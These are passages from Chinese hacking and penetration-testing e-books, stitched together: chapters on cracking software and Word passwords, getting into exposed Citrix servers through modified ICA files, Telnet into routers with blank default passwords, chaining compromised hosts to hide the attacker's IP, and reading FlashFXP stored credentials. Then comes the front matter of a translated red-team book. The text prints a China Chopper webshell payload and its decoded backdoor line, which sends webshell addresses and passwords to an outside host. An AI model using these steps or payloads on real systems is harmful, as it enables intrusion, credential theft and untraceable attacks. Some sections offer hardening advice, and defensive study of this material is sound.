使用C32asm反汇编原文件以后,单击右键,在弹出的快捷菜单中选择“跳到”选项,在“Eip跳转对话框”中输入跳转地址“004513D2”,如图7-142所示,然后单击“确定”按钮,回到C32asm反汇编窗口。 图7-142 设置跳转地址 回到C32asm窗口,会高亮显示跳转地址代码。
图7-143 修改反汇编地址 再次选中记录“:004513D2:: 75 12 JNZ SHORT 004513E6”,单击右键,在弹出的快捷菜单中选择“汇编”选项。 如图7-144所示,直接将“JNZ SHORT 004507E6”修改为“NOP”或者“JE SHORT 004507E6”,然后保存。
未知 7.15 Word文件的加密与解密 Word是目前世界上使用最为广泛的办公文字处理软件之一,在国内有超过90%的办公用户在使用它。政府、企业及个人都喜欢用Word来处理工作和个人事务。使用Word文档时,根据不同的安全或保密等级,可以在保存文档时对文件进行加密,在需要阅读文件内容时进行解密。使用一些Word文件破解软件可以破解简单的密码,但对于复杂一点的密码就无能为力了。 本案例就Word文件的加密和解密方式进行探讨,通过本案例读者可以了解Word文件加密的相关知识,以及如何使用工具软件轻松破解加密后的Word文件。 7.15.1 加密Word文件 一般情况下,我们所说的对Word文件进行加密是指采用Word字处理软件自带的加密功能进行加密。 01 打开“安全性”选项卡 在Word文件编辑状态下,依次选择“工具”→“选项”→“安全性”选项,打开如图7-146所示的界面。 02 设置加密密码 Word文件加密常用的选项有两种,一种是打开权限,另外一种是修改权限(可以对文件进行修改)。在对Word文件进行加密时,可以根据需要设置打开权限密码和修改权限密码。设置完毕单击“确定”按钮保存设置时,需要再次确认密码,如图7-147所示。确认完毕,关闭Word文件,再次打开时就需要输入密码了。如果设置的是修改权限密码,再次打开时会提示用户需要分别输入打开权限密码和修改权限密码。 图7-146 “安全性”选项卡 图7-147 设置加密密码 说明 图7-148 选择Word加密类型 目前也有单独针对Word文件开发的加解密软件,解密这种Word文件非常困难。Word提供了多种加密算法类型,在如图7-146所示的界面单击“高级”按钮,可以在打开的窗口查看和选择不同的加密类型,如图7-148所示。Word默认的加密类型是“Office97/2000兼容”,该加密类型非常容易被破解。 如果要对Word文件进行较高等级的安全保护,建议采用其他加密类型。除了“Office97/2000兼容”加密类型外,其他加密类型均较难破解。对这些加密类型多采用暴力破解,其破解主要与字典有关。 7.15.2 破解加密的Word文件 目前网上有很多关于Word密码破解的软件,如Word Password Recovery Master无限制版、Advanced Office Password Recovery。其主要破解方式是暴力破解,破解成功后会显示原来的加密密码。如果密码相对复杂,破解时间会特别长。 Office Password Remover用于破解“Office97/2000兼容”加密类型的Word加密文件,速度非常快,通常耗时不超过1分钟。其缺点是在破解时需要访问网站http://www. rixler.com/,而且破解后不显示原来的密码。Rixler是一家从事密码恢复的软件公司,其网站还提供了许多密码恢复软件,原版Office Password Remover的下载地址为http:// www.rixler.com/download.htm。 说明 解密Word文件的方式有以下3种。 暴力破解。这是最常用的方式,通过编程将字典中的值依次输入进行尝试,一旦尝试成功,则说明该值为破解值,其破解成功与否往往取决于字典的完善程度。字典在网络安全中扮演着非常重要的角色,不断完善和更新字典是一个好习惯。 针对算法的破解。这种方式要求我们对加密算法非常熟悉,通过加密算法中的缺陷或者是针对加密算法的破解算法进行编程,然后进行自动破解。这种方法速度快,但是使用此类破解软件的技术难度较高。 另类破解。采用这类方法的破解者是天才中的天才,也就是“只有你想不到的,没有他们做不到的”。他们往往采用常人想不到的破解方式进行破解,如王晓芸教授破解MD5加密算法。 使用Office Password Remover破解加密Word文件的步骤如下。 01 打开待破解的Word文件 打开待破解的Word文件后,会出现一个提示输入密码的对话框,如图7-149所示。只有输入正确的密码才能打开该Word文件。 02 开始破解 Office Password Remover的使用很简单,启动后界面如图7-150所示。Office Password Remover汉化后称为OPRemovba_chs。依次单击“文件”→“打开”选项,选择需要破解的Word文件,选择完毕后单击“移出密码”按钮。 图7-149 打开Word加密文件 图7-15 0Office Password Remover 说明 图7-151 解密文档 (1)Office Password Remover在解密文档的过程中需要连接网络。将Word文件中的加密密钥发送到Rixler公司的网站,如图7-151所示。 (2)如果计算机安装了防火墙,一定要设置为允许Office Password Remover通过,否则无法进行破解。当然,为了确保系统的安全,一个折中的办法是破解完成后在防火墙允许程序访问列表中将该程序删除。 03 破解成功 图7-152 解密成功提示 Office Password Remover的破解效率比较高,一般在20秒内就能将加密的Word文件破解。破解成功后会弹出如图7-152所示的“这个文档已经被成功解密!”的提示框。 说明 Office Password Remover破解加密的Word文件后,会在原文件的目录下自动生成一个以“原文件 (DEMO)”方式命名的文件,如图7-153所示。在本例中,原文件为“****网站项目开发合同.doc”,破解成功后会生成“*****网站项目开发合同(DEMO).doc”文件。使用原版的Office Password Remover软件时,如果没有进行注册,则会生成部分文件信息,而不是解密全部文件。 图7-153 解密成功的DEMO文件 技巧 单击“在Microsoft Word中打开文档”选项,可以直接打开被解密的Word文件。
服务器端ICA软件:将应用程序的执行和显示逻辑分开,应用程序完全在服务器上运行,并通过标准的网络协议(TCP/IP、SPX、IPX、NETBEUI、NWLINK)将显示界面传送给客户端。 客户端设备上的ICA软件:一方面接收显示界面,另一方面向服务器发送鼠标移动和键盘击键动作信息,对服务器上的应用程序进行操作。
7.16.2 Citrix的工作方式 Citrix主要有Citrix MetaFrame和Citrix NFuse/Citrix安全网关两种工作方式。 Citrix MetaFrame有XPs、XPa及XPe共3个版本,适合在不同的环境使用。
不过在安装过程中需要注意一点:在选择客户端时只选择安装“Program Neighborhood”,不安装“Web客户端”和“Program Neighborhood Agent”,如图7-154所示。
很多Citrix服务器在配置完毕后会将ICA文件放到网上供下载使用。 也有一些Citrix服务器配置完毕后不会将ICA文件放在网上,不过用户只要获取正确的ICA文件即可进行连接。
获取ICA文件最简单、最方便的方法就是通过搜索引擎获取。 直接打开浏览器,在Google的搜索框中输入“Filetype:ica”,搜索ICA文件,搜索结果如图7-155所示。 图7-155 搜索ICA文件 03 下载ICA文件 在搜索结果中任意选择一条记录,将其指向的ICA文件保存到本地。 保存ICA文件的目的就是在本地进行查看,如图7-156所示,在ICA文件中可以看到WFClient、ApplicationServer、Route Clearing DB、EncRC5-0、Compress共5个参数。
在权限管理不严格的Citrix服务器中,如果将InitialProgram参数的值改成“cmd.exe”或“explorer.exe”,连接Citrix服务器后就可以直接调出远程服务器上的命令提示符或者资源管理器了。 04 直接打开ICA文件 Citrix Presentation Server客户端正确安装后,默认打开后缀为 .ica的文件。 也可以直接单击网页中的ICA文件链接地址,打开Citrix连接提示框。
在连接过程中会给出一些提示,如果服务器、客户端及参数相匹配,则会出现登录警告等提示信息,如图7-157所示。 图7-157 登录警告提示信息 在测试过程中,会有很多ICA文件被提示为无效的或者过时的,有的文件虽然会出现连接提示信息,但由于协议不匹配,也无法成功连接。
【Shift】+【F1】:打开本地任务列表。 【Shift】+【F2】:切换标题栏。 【Shift】+【F3】:关闭远程应用程序。 【Ctrl】+【F1】:显示Windows安全桌面,相当于本地快捷键【Ctrl】+【Alt】+【Del】。 【Ctrl】+【F2】:打开远程任务列表。 【Ctrl】+【F3】:打开远程任务管理器,相当于本地快捷键【Ctrl】+【Shift】+【Esc】。 【Alt】+【Minus】:在各个任务之间切换,相当于本地快捷键【Alt】+【Shift】+【Tab】。
在出现确定的连接后,使用快捷键【Ctrl】+【F3】打开远程任务管理器,如图7-159所示。 图7-159 打开远程计算机上的任务管理器 06 进入远程Citrix服务器 在上一步笔者进入了一台日文的Citrix服务器,很多内容看不懂,于是换了一台英文的服务器进行测试。 通过快捷键【Ctrl】+【F3】打开远程计算机上的任务管理器,然后在任务管理器中依次单击“文件”→“新建任务”→“打开”选项,在其中输入“cmd.exe”或“Explorer”,直接打开命令提示符或者资源管理器窗口。
1.修改参数失效 在下载的ICA文件中,有些时候通过修改参数InitialProgram的值即可顺利进入远程服务器。 但是,有些ICA文件在修改该值后,连接Citrix服务器时要求输入用户名和密码,在没有获取用户名和密码的情况下基本无法进入。 2.具有执行程序权限却很难提权 通过ICA文件连接,使用快捷键绕过密码验证后,虽然能够使用计算机中的资源执行部分或者全部程序,但由于权限限制,如果登录的用户没有获得administrator权限,则服务器提权成功很难。
Citrix的更多漏洞可以参考http://secunia.com/advisories/search/?search=citrix。 3.Citrix服务器的一些安全配置方法 现将Citrix服务器的安全配置方法总结如下。
建立一个组,把所有Citrix用户放到这个组里,禁止它们访问cmd.exe、ftp.exe、tftp.exe、rcp.exe、net.exe、command.com、iexplorer.exe等可能对系统有危害的程序和文件(在安全与应用的平衡之间作出选择)。
未知 7.17 从渗透扫描到路由器跳板攻击 在网络安全的学习过程中,最大的特点就是研究和实践。本案例的内容来自一个网络安全渗透项目,在这里拿出来与大家分享。 通过本案例,读者可以了解如何使用SuperScan 3.0扫描指定单个IP地址或者IP地址范围端口开放情况,扫描端口的处理思路,以及采用跳板的原则。 7.17.1 渗透准备 本案例中用到的工具软件相对较少,需要准备如下工具和实验环境。 端口扫描工具SuperScan 具备Telnet的服务器或者肉机1台 预扫描IP地址段 说明 本次渗透测试的对象是一个固定IP地址段。由于要保护客户的隐私信息,笔者只是展现了渗透中确实能够出现的场景,以及切实可行的思路,但IP地址范围等可能无法重现。 7.17.2 渗透扫描和连接测试 下面讲解渗透扫描和连接测试的步骤。 01 实施端口扫描 运行SuperScan 3.0,在IP地址“起始”和“终止”文本框中分别输入待扫描的IP地址,可以是一个IP地址,也可以是一个范围。在“扫描类型”设置区勾选“查询计算机名”和“显示主机响应”复选框,然后选中“列表中的端口”单选项。本次扫描是对一段IP地址进行全端口扫描,所以自定义扫描端口范围为1~65535。单击“开始”按钮,实施端口扫描,结果如图7-161所示。 注意 (1)在实际渗透过程中可以根据需要进行扫描,大范围扫描时不要全部扫描,否则耗时特别长。如果仅针对23端口,可以只扫描23端口。 (2)扫描可以在肉机上进行,需要特别注意的是SuperScan扫描软件不能自动保存扫描结果。 图7-161 对指定IP地址范围的主机实施全端口扫描 02 整理并测试端口扫描结果 如果扫描的IP地址不是特别多,很快就会在SuperScan中得到扫描结果。如图7-162所示,在本次扫描中,开放21端口的设备数量最多,开放23端口的设备仅有1台。直接选中开放23端口的服务器,然后单击右键,在弹出的快捷菜单中选择“Telnet登陆”选项。 图7-162 整理并测试端口扫描结果 03 Telnet登录 如果Telnet连接成功,则会出现如图7-163所示的要求输入密码和用户名的登录窗口。 说明 (1)在一般的服务器上,Telnet登录都是需要用户名和密码的,但在实际测试过程中我们发现,很多路由器和防火墙的密码默认为空,其用户名多为“admin”。 (2)如果碰到需要验证的情况,可以进行猜测,如果多次猜测错误则只能放弃。 图7-163 Telnet登录窗口 04 继续扫描和测试 重复上面的步骤继续进行扫描和测试,终于出现了一个我们比较熟悉的窗口,如图7-164所示,表示Telnet成功。到网上搜索了一下,发现“telecom”多为电信设备,一般为路由器。 图7-164 使用Telnet连接成功 7.17.3 跳板思路的测试和验证 由于路由器都提供了Telnet功能,因此可以先Telnet到路由器(或者Telnet到肉机服务器再Telnet到路由器),形成“本地→肉机→路由器→工作平台”或者“本地→路由器→肉机→工作平台”的连接线路,从而达到隐藏本地IP地址的目的,也就是搭建通常意义上的“跳板”。 01 从Telnet到跳板服务器或肉机 在telecom提示符下输入需要连接的服务器,在本例中直接输入“telnet 218. ***.***.*** 443”,连接该服务器的443端口。Telnet默认端口为23,在本例中我们对该服务器的Telnet端口进行了修改,以便隐藏。如图7-165所示,此时显示一个登录信息,该信息表明我们Telnet的服务器操作系统是Windows 2000 Server。输入用户名“Administrator”,以及该用户所对应的密码,验证成功后会出现如图7-166所示的界面。 图7-165 从路由器Telnet到肉机 图7-166 Telnet连接成功 02 验证Telnet的效果 在肉机上执行“IPconfig /all”命令可以查看其网络配置情况,如图7-167所示,表明我们通过路由器Telnet后可以在新的Telnet上执行命令。执行“netstat -n | find "443"”命令查看路由器和肉机的网络连接情况,如图7-168所示,验证了跳板的可行性。 说明 (1)理论上,在Telnet上可以建立N个连接,但在实际使用过程中,只要有5个以上就可以了。推荐线路为“本地→国(内)外肉机→路由器→国(内)外肉机→工作平台”。这样的线路一般很难追踪。 (2)以上思路适合于在DOS命令下执行攻击,也就是执行批处理攻击类型,尤其适合Linux下的攻击。 图7-167 在跳板上执行命令 图7-168 查看网络连接情况 7.17.4 路由器攻击和测试 接下来我们进行路由攻击和有关测试。 1.在路由器上执行命令 在telecom提示符下输入“?”获取帮助信息,如图7-169和图7-170所示。路由器有多条命令,根据这些提示输入命令并执行,在执行过程中总是报错,仅能显示一些简单的信息。由于笔者对直接在路由器上执行命令不太熟悉,因此未进行深入测试,熟悉路由器的读者可以自行测试。 图7-169 显示路由器的命令 图7-170 显示路由器的命令(续) 2.路由器提权 既然进入了路由器,那就看看如何进行提权。通过查询,还真找到一些有关路由器提升权限的漏洞,这些漏洞需要构建才能实现。由于本次渗透主要是针对跳板的测试,因此关于路由器渗透方面的问题留在以后研究。 7.17.5 加固方法 笔者认为,在路由器初始设置完毕后可以关闭23端口,或者对23端口进行限制IP地址访问的操作,同时给路由器设置一个比较复杂的用户名和密码。
”互联网上流传的很多安全工具是带有后门的,如SSH Secure Client就曾被曝留有后门(Putty汉化版被爆存在后门,可窃取管理员账号,http://os.51cto.com/art/201202/314269.htm)。
7.18.1 “中国菜刀”简介 “中国菜刀”是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。 只要支持动态脚本的网站,都可以用“中国菜刀”来管理。
在本机安装ComsenzEXP(下载地址http://www.comsenz.com/downloads/install/ exp)。 在ComsenzEXP安装目录的wwwroot文件夹下新建一句话后门PHP文件。 安装WSockExpert_Cn程序。
7.18.3 分析并获取后门 分析并获取“中国菜刀”后门的操作如下。 01 新建记录 在“中国菜刀”中新建一条WebShell记录,加入一句话后门地址“http:// 127.0.0.1/1.php”,密码为“x”,如图7-171所示。
设置完成后WSockExpert_Cn开始对“中国菜刀”进行监听并获取其通信过程中的包等数据。 图7-172 配置WSockExpert_Cn抓包软件 03 使用“中国菜刀”打开WebShell 在“中国菜刀”中打开WebShell记录“http://127.0.0.1/1.php”,如图7-173所示,可以对WebShell所在的计算机进行浏览、删除、上传等操作。 图7-173 打开WebShell 04 获取数据 在WSockExpert_Cn中可以看到抓取数据包的记录,在其中选择第2条记录,如图7-174所示。
x=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%2 9%29%3B&amp;z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuW FNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZ DNkeTVoY0drdVkyOXRMbVJsTDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVV kZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6M G5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwI ik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNob ygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkR D09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9X HQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJ EwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb 25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0Z XVpZCgpKTonJzskdXNyPSgkdSk%2FJHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyR SLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGl lKCk7 图7-174 查看数据包 05 对URL数据进行解包 将上面获取的数据复制到Encode中,如图7-175所示。
x=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&amp;z0=QGV2YWwoYmFzZTY0X2R lY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2R NZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVoY0drdVkyOXRMbVJsTDBGd2F TNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1Z TV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OSc pKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0B zZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9 TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZ FUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0 iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSR SLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2l kJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk/JHV bJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHV zcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7 将解码后的“z0=”后面的数据复制到Encode的输入框中,选择“BASE64”选项,如图7-176所示,获取第1次Base64解码后的数据,具体如下,加粗的部分还存在Base64加密。 @eval(base64_decode ('aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWt lJywxKTtAZmlsZSgnaHR0cDovL3d3dy5hcGkuY29tLmRlL0FwaS5waHA/VXJsPScuJF9TRVJ WRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicmUGFzcz0nLmtleSg kX1BPU1QpKTt9')); @ini_set("display_errors","0");@set_time_limit(0);@set_ magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAM E"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(su bstr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.= "{$L}:";}$R.="\t";$u=(function_exists ('posix_getegid'))?@posix_getpwuid (@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_un ame();$R.="({$usr})";print $R;;echo("|<-");die(); 将以上代码中加粗显示的部分复制到Encode程序的输入框中,选择“BASE64”选项进行解密,如图7-177所示,获取其后门地址代码如下。
if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.api.com.de /Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&amp;Pass='.ke y($_POST));} 其中,“http://www.api.com.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER ['REQUEST_URI'].'&Pass='.key($_POST)”为后门接收地址。
图7-176 第一次Base64解码 图7-177 获取后门地址 7.18.4 小结 通过上面的分析,可以了解到“中国菜刀”留有后门,用户在使用该工具的过程中会自动将WebShell记录发送到指定网站。
参考文章 《Fireeye技术剖析中国菜刀》,http://www.freebuf.com/articles/web/11687.html 《Putty汉化版被爆存在后门可窃取管理员账号》,http://os.51cto.com/art/201202/314269.htm
未知 7.19 FlashFXP密码的获取 FlashFXP是一款FTP管理软件,用户通过FlashFXP连接FTP服务器,使用文件上传和下载等功能。FlashFXP可以将站点记录在本地,保存其连接时的账号和密码,这些配置信息会在软件的当前目录下保存。如图7-178所示,quick.dat对应于快速连接信息,Sites.dat对应于站点信息,favorite.dat对应于收藏信息,Bookmarks.dat对应于书签信息。如果在渗透中找到这些文件,可以将其下载到本地进行还原,获取其中的账号和密码,从而进一步实施渗透和控制。 图7-178 下载FlashFXP数据文件 7.19.1 修改设置 运行FlashFXP,单击“选项”菜单,如图7-179所示,勾选“在选择密码字段时展现密码”复选框。 图7-179 修改密码显示设置 7.19.2 查看并获取密码 依次单击“站点”→“站点管理器”选项,打开“站点管理器”窗口,如图7-180所示,在“快速连接”目录中选择一条记录,窗口右边会显示相关信息,将光标移动到“密码”输入框即可获取密码明文。 图7-180 获取密码 7.19.3 查看quick.dat文件 使用“记事本”程序打开quick.dat文件,如图7-181所示,其中有IP地址、端口、用户名及密码等信息,这里的密码是经过加密的。 图7-181 查看quick.dat文件 Cover
Cover 未知 版权信息 书名:【抢鲜版】-黑客秘笈——渗透测试实用指南(第3版) ISBN:978-7-115-52917-6 本书由人民邮电出版社发行数字版。版权所有,侵权必究。 您购买的人民邮电出版社电子书仅供您个人使用,未经授权,不得以任何方式复制和传播本书内容。 我们愿意相信读者具有这样的良知和觉悟,与我们共同保护知识产权。 如果购买者有侵权行为,我们可能对该用户实施包括但不限于关闭该帐号等维权措施,并可能追究法律责任。 未知 版 权 著 [美]皮特 • 基姆(Peter Kim) 译 孙 勇 徐太忠 责任编辑 张 涛 人民邮电出版社出版发行 北京市丰台区成寿寺路11号 邮编 100164 电子邮件 315@ptpress.com.cn 网址 http://www.ptpress.com.cn 读者服务热线: (010)81055410 反盗版热线: (010)81055315 未知 版权声明 Simplified Chinese language edition published by POSTS & Telecom Press Copyright ©2020. All Rights Reserved. The Hacker Playbook 3: Practical Guide To Penetration Testing,by Peter Kim, ISBN 9781980901754 Copyright ©2019 by Peter Kim. 本书中文简体版由作者授权人民邮电出版社有限公司出版。未经出版者书面许可,对本书的任何部分不得以任何方式或任何手段复制和传播。 版权所有,侵权必究。 未知 内容提要 本书是畅销图书《黑客秘笈—渗透测试实用指南》(第2版)的全新升级版,不仅对第 2版内容进行了全面更新,还补充了大量的新知识。书中涵盖大量的实际案例,力求使读者迅速理解和掌握渗透测试中的技巧,做到即学即用。 本书共分为11章,内容涵盖了攻击工具的安装和使用、网络扫描、网络漏洞利用、突破网络、物理访问攻击、规避杀毒软件检测、破解密码的相关技巧以及如何编写分析报告等。 本书适合网络安全从业人员以及对黑客技术感兴趣的爱好者阅读,还可以作为高校信息安全专业师生的参考书。
未知 前 言 这是“黑客秘笈”系列图书的第3版。除第1版和第2版介绍的一些攻击方法和技术(目前仍有效)外,本书还将介绍以下新的漏洞和攻击方法。 活动目录攻击。 Kerberos攻击。 网站攻击高级技术。 更好的横向渗透方法。 云漏洞。 快速和智能口令破解。 使用系统凭证和合法软件开展攻击。 横向移动攻击。 多种定制试验环境。 新出现网站编程语言漏洞。 物理攻击。 权限提升。 PowerShell攻击。 勒索攻击。 红队与渗透测试。 搭建红队所需的基础设施。 红队效果评估。 开发恶意软件和规避杀毒软件。 …… 除此之外,本书尝试响应读者对第1版和第2版图书提出的评论和建议,并作出了反馈。这里要强调的是,我不是职业作家,仅仅是喜欢安全技术,喜欢传播安全技术。这本书是我注入满腔热情写作的,希望您能够喜欢。 本书将深入探讨如何建立设备实验室的环境,用来检测攻击效果,同时还会介绍最新的渗透方法和技巧。本书力求通俗易懂,很多学校已经把这本书作为教科书。书中尽可能多地增加试验章节,为读者展示测试漏洞或者利用漏洞的方法。 与前两版图书相似,本书中的内容尽可能以实战为基础。本书中并不涉及理论攻击技术,主要内容来自于作者的实战技术和经验。目前网络安全已经有了很大变化,主要从渗透测试转到红队攻击模式,本书不是仅仅介绍这些变化,而是通过示例展示为什么发生这样的变化。因此本书目标分为两部分:一是了解攻击者的攻击思路,理解攻击怎样开展的;二是介绍攻击工具和技术,并详细解释。除帮助读者理解概念和展示试验过程外,本书更重要的目的在于启发读者进行独立思考和探索。与其辛苦地写简历(当然,您需要一份简历),还不如拥有一个很有影响力的Github代码库和技术博客,我认为这会胜过一份好简历。无论您是从事防御研究还是攻击研究,深入了解相关技术发展,并且与安全同行进行分享是必不可少的。 没有读过前两本书的读者,可能会产生疑问,我的经验来自于什么地方。我的工作背景包括超过12年的渗透测试/红队攻击经验,测试的对象包括大型的金融机构、大型的公用事业公司、财富500强企业和政府机构。多年来我也在多个大学传授网络安全攻击课程,在多个安全会议上做过主题发言,在多个安全杂志上发表论文,在国内各个地方授课,举办多个公开CTF比赛,并开办个人安全学校。我个人最感兴趣的项目是在南加州经营一个免费和开源安全社区LETHAL。目前,社区成员超过800人,每个月有安全主题会议和CTF比赛等多项活动,社区已经成为人们分享、学习和提高安全技能的一个神奇的平台。 一个重要提示是我同时使用商用工具和开源工具。对于每一个商用工具,我都会尽可能找到对应的开源工具。偶尔会遇到某些渗透测试人员,他们表示只使用开源工具。作为一名渗透测试人员,我觉得这种观念很难接受。“坏小子”没有仅使用开源工具的限制,因此如果要模拟“真实世界”的攻击,您需要使用任何有助于完成任务的工具。 我经常被问到,这本书面向哪些读者?这个问题很难回答,我认为安全人员都可以从这本书中学到知识。书中部分内容对于新手来说有些高深,部分内容对于有经验的黑客有些简单,还有些内容甚至可能与从事的领域无关。 声明和责任 我重申以下提示非常重要:如果未得到合法授权,不要扫描他人服务器,探测是否存在漏洞并攻击服务器。如果未得到合法授权,不要尝试本书中提到的任何攻击方法。即使不是怀着恶意目的,而只是好奇,上述行为也会为他人增添很多麻烦。目前有大量漏洞奖励项目和漏洞网站/虚拟机,可以用于学习技术和提高能力。对于有些漏洞奖励项目,超出约定范围或者攻击范围过广都会招惹麻烦。 如果您对上述提示感到困惑,那么可能是我表达得不清楚,您可以咨询律师或者联系电子前线基金会(EFF)。在技术研究和非法活动之间有一条清晰的界限。 请记住,您仅在测试系统中有权限写入程序。在Google搜索关键词“hacker jailed”(黑客监禁),您会看到大量不同的案例,比如青少年由于做了他们认为“很好玩”的事情而被判入狱多年。网络上有很多免费的平台,允许对其使用合法的技术,并且能够帮助您提高能力。 最后,我不是Windows、代码、漏洞挖掘、Linux或者其他领域的专家。如果在具体技术、工具或者进程等方面出现误差或遗漏,我会在本书的更新网站上更正相关内容。书中很多内容借鉴自其他人的安全领域研究成果,我会尽可能提供原成果的网络链接地址。
位于两个旋臂之一上的这颗行星被称为KITT-3n,其大小是地球的两倍,位于名为OI 31337的二元系统中,其恒星的大小也是地球恒星的两倍。
这是您目前的处境…… 如果您选择接受任务,任务是找到所有外部和内部漏洞,使用最新漏洞和组合漏洞开展攻击,来确定防御团队是否能够检测到或阻止攻击行为。
在这次行动中,您需要进行大量的侦察和探测,寻找外部基础设施中的弱点,采用社会工程方法欺骗雇员,进行权限提升,获取内部网络信息,在整个网络中横向移动,并最终进入KITT-3n系统和数据库。
在传统的网络测试中,我们通常会扫描漏洞,查找并攻击存在漏洞的系统或应用程序,可能会进行一些后期漏洞利用,查找域管理员并编写渗透测试报告。
如今,即使公司有漏洞管理流程、安全软件开发生命周期流程、渗透测试人员、应急响应团队/流程以及许多非常昂贵的安全工具,公司的网络仍然可能被攻陷。
红队的研究报告需要更多地针对防御团队流程、策略、工具和技能方面的差距,而不是漏洞列表。 在红队的最终报告中,可能会展示一些在任务中发现的漏洞,但是更多的内容是安全流程中存在的缺陷。 注意,红队的输出报告应该主要针对安全流程,而不是针对IT(信息技术)部门未修补的漏洞。
渗透测试 红队 有条不紊的安全评估: ● 前期交流 ● 情报搜集 ● 漏洞分析 ● 漏洞利用 ● 漏洞后利用 ● 报告 灵活的安全评估: ● 情报搜集 ● 初步立足点 ● 持久性/本地权限提升 ● 本地主机/网络枚举 ● 横向移动 ● 数据分析/数据获取 ● 获取域权限/获取系统散列 ● 报告 范围: ● 限制范围 ● 1~2周参与 ● 一般公告 ● 发现漏洞 范围: ● 没有规则* ● 1周~6个月的参与时间 ● 没有公告 ● 检验防御团队的流程、策略、工具和技能 *不能违法…… 作为红队,我们需要向公司展示自身价值。
即使杀毒软件、主机安全系统或者监控工具可能检测到攻击行为,但是记录的检测时间是安全分析人员检测到攻击行为并创建分析攻击事件的时间。
未知 资源与支持 本书由异步社区出品,社区(https://www.epubit.com/)为您提供相关资源和后续服务。 配套资源 本书提供如下资源: 本书配套资源请到异步社区本书购买页下载。 要获得以上配套资源,请在异步社区本书页面中单击 ,跳转到下载界面,按提示进行操作即可。注意:为保证购书读者的权益,该操作会给出相关提示,要求输入提取码进行验证。 提交勘误 作者和编辑尽最大努力来确保书中内容的准确性,但难免会存在疏漏。欢迎您将发现的问题反馈给我们,帮助我们提升图书的质量。 当您发现错误时,请登录异步社区,按书名搜索,进入本书页面,单击“提交勘误”,输入勘误信息,单击“提交”按钮即可。本书的作者和编辑会对您提交的勘误进行审核,确认并接受后,您将获赠异步社区的100积分。积分可用于在异步社区兑换优惠券、样书或奖品。 与我们联系 我们的联系邮箱是contact@epubit.com.cn。 如果您对本书有任何疑问或建议,请您发邮件给我们,并请在邮件标题中注明本书书名,以便我们更高效地做出反馈。 如果您有兴趣出版图书、录制教学视频,或者参与图书翻译、技术审校等工作,可以发邮件给我们;有意出版图书的作者也可以到异步社区在线提交投稿(直接访问http://www.epubit.com/selfpublish/submissionwww.epubit.com/selfpublish/submission即可)。 如果您所在的学校、培训机构或企业想批量购买本书或异步社区出版的其他图书,也可以发邮件给我们。 